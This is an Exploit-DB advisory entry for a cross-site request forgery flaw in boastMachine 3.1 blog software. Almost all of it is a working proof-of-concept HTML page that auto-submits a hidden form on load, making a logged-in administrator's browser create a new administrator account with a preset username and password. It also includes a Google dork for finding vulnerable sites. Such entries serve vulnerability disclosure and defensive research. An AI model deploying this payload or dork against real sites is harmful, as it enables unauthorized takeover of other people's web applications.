boastMachine <= 3.1 - CSRF Add Admin Vulnerability

2012-03-28T00:00:00
ID EDB-ID:18676
Type exploitdb
Reporter Dr.NaNo
Modified 2012-03-28T00:00:00

Description

boastMachine <= 3.1 - CSRF Add Admin Vulnerability. Webapps exploit for php platform

                                        
                                            # Exploit Title: boastMachine v3.1 &lt;= CSRF Add Admin Vulnerability
# Date: 28/3/2012
# Author: Dr.NaNo
# Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
# Version: 3.1
# Tested on: Linux-Red-Hat
# Google Dork: Powered by boastMachine v3.1
#
########################################################
#                     ~ Exploit ~                      #   
########################################################

&lt;html&gt;
&lt;form  name="nano" action="http://localhost/{PACH}/bmc/admin.php?action=add_user&blog" method="post"&gt;
&lt;input type="hidden" name="action" value="add_user"&gt;&lt;br/&gt;
&lt;input type="hidden" name="do" value="add"&gt;&lt;br/&gt;
&lt;input type="hidden" value="NANO" name="user_login"&gt;&lt;br/&gt;
&lt;input type="hidden" value="NANO1234" name="user_pass"&gt;&lt;br/&gt;
&lt;input type="hidden" value="Administrator" name="user_name"&gt;&lt;br/&gt;
&lt;input type="hidden" value="security@wsecurity.com" name="user_email"&gt;&lt;br/&gt;
&lt;input type="hidden" value="4" name="blogs[]"&gt;&lt;br/&gt;
&lt;input type="hidden" value="4" name="user_level"&gt;&lt;br/&gt;
&lt;input type="hidden" value="Add"&gt;&lt;br/&gt;
&lt;/form&gt;
&lt;script&gt;document.nano.submit();&lt;/script&gt;
&lt;/html&gt;

########################################################
#                                                      #
# ~ Greetz : Dr.WEP , JIKO , ( All FriendS ) ~          #
#                                                      #
########################################################